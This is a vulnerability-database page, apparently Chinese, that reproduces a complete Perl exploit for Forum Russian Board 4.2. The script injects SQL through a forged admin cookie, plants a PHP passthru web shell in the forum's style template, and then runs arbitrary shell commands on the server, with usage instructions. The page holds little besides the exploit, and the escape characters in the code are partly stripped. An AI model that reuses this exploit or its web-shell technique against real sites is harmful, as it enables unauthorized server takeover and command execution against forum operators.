Forum Russian Board 4.2 – Full Command Execution
漏洞ID | 1055175 | 漏洞类型 | |
发布时间 | 2005-06-21 | 更新时间 | 2005-06-21 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | PHP | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/perl
# Forum Russian Board 4.2 Full (FRB) (http://www.carline.ru , http://frb.ru)
# command execution exploit by RST/GHC (http://rst.void.ru , http://ghc.ru)
# bugs found by foster & 1dt.w0lf , xpl coded by 1dt.w0lf
# RST/GHC - http://rst.void.ru , http://ghc.ru
use IO::Socket;
use Getopt::Std;
getopts("h:p:u:i:c:");
$host = $opt_h;
$path = $opt_p;
$user = $opt_u;
$id = $opt_i;
$cmd = $opt_c || 'create';
$cmdspl = "%26%26"; # ; - for unix
# %26%26 - for windows
if(!$host || !$path) { usage(); }
if(($cmd eq 'create' || $cmd eq 'delete') && (!$user || !$id)) { usage(); }
$host =~ s/(http://)//g;
$cook = $user."' /*";
if($cmd eq 'create' || $cmd eq 'delete'){
head();
print ">>> CREATE SHELLn" if ($cmd eq 'create');
print ">>> DELETE SHELLn" if ($cmd eq 'delete');
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECT FAILEDn";
print $sock "GET ${path}admin/style_edit.php HTTP/1.1n";
print $sock "Host: $hostn";
print $sock "Accept: */*n";
print $sock "Cookie: board_user_cook=$cook;board_user_id=$idn";
print $sock "Connection: closenn";
print "GETTING CURRENT STYLE ... [";
while ($res = <$sock>)
{
if($res =~ /(.*)</textarea>/) { $data .= $1; $p = 0; }
$data .= $res if $p;
if($res =~ s/(.*)(<textarea)([^<>]*)([>])(.*)/$5/) { $data .= $res; $p = 1; }
}
if(length($data)>0) { print " DONE ]n"; }
else { print " FAILED ]n"; exit(); }
if($data =~ /rst_ghc/)
{
if($cmd eq 'create') { print "SHELL ALREADY EXIST!"; exit(); }
if($cmd eq 'delete')
{
print "SHELL EXIST.nDELETING SHELL.n";
$data =~ s/s*<? if($_GET[rst_ghc]){ passthru($_GET[rst_ghc]); } ?>//g;
}
}
else
{
if($cmd eq 'create')
{
$data .= "n";
$data .= '<? if($_GET[rst_ghc]){ passthru($_GET[rst_ghc]); } ?>';
}
if($cmd eq 'delete') { print "SHELL NOT EXIST. CAN'T DELETE."; exit(); }
}
$data =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$post = "message=${data}&form_h=yes&style_edit_ok=%C8%E7%EC%E5%ED%E8%F2%FC";
print "CREATE NEW STYLE ...[";
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECT FAILEDrn";
print $sock "POST ${path}admin/style_edit.php HTTP/1.1n";
print $sock "Host: $hostn";
print $sock "Cookie: board_user_cook=$cook;board_user_id=$idn";
print $sock "Content-Type: application/x-www-form-urlencodedn";
print $sock "Content-length: ".length($post)."nn";
print $sock "$post";
print $sock "nn";
print " DONE ]n";
if($cmd eq 'create') { print "SHELL CREATED SUCCESSFULLY! NOW YOU CAN TRY EXECUTE COMMAND."; }
if($cmd eq 'delete') { print "SHELL DELETED!"; }
}
else
{
head();
print ">>> COMMAND EXECUTEn";
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECT FAILEDn";
print $sock "GET ${path}index.php?rst_ghc=echo%20_START_%20$cmdspl%20$cmd%20$cmdspl%20echo%20_END_%20; HTTP/1.1n";
print $sock "Host: $hostn";
print $sock "Accept: */*n";
print $sock "Connection: closenn";
while ($res = <$sock>)
{
if($res =~ /^_END_/) { $p = 0; }
$data .= $res if $p;
if($res =~ /^_START_/) { $p = 1; }
}
if(length($data)>0) {
print "-----------------------------------------------------------------n";
print $data;
print "-----------------------------------------------------------------n";
exit(0);
}
else { print "[-] FAILEDnMaybe you forget create shell first?n"; exit(0); }
}
sub usage()
{
head();
print " USAGE : r57frb.pl [options]nn";
print " Options: n";
print " -h - host e.g. '127.0.0.1' , 'www.frb.ru'n";
print " -p - path to forum e.g. '/frb/' , '/forum/'n";
print " -u - admin username e.g. 'admin'n";
print " -i - admin id e.g. '1'n";
print " -c [create|delete|cmd]n";
print " create - for create shelln";
print " delete - for delete shelln";
print " cmd - any command for executen";
print "-----------------------------------------------------------------n";
exit(0);
}
sub head()
{
print "-----------------------------------------------------------------n";
print "Forum Russian Board 4.0 Full command execution exploit by RST/GHCn";
print "-----------------------------------------------------------------n";
}
# milw0rm.com [2005-06-21]
相关推荐: 4D WebStar Symbolic Link Vulnerability
4D WebStar Symbolic Link Vulnerability 漏洞ID 1098239 漏洞类型 Design Error 发布时间 2004-07-13 更新时间 2004-07-13 CVE编号 N/A CNNVD-ID N/A 漏洞平台 …
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666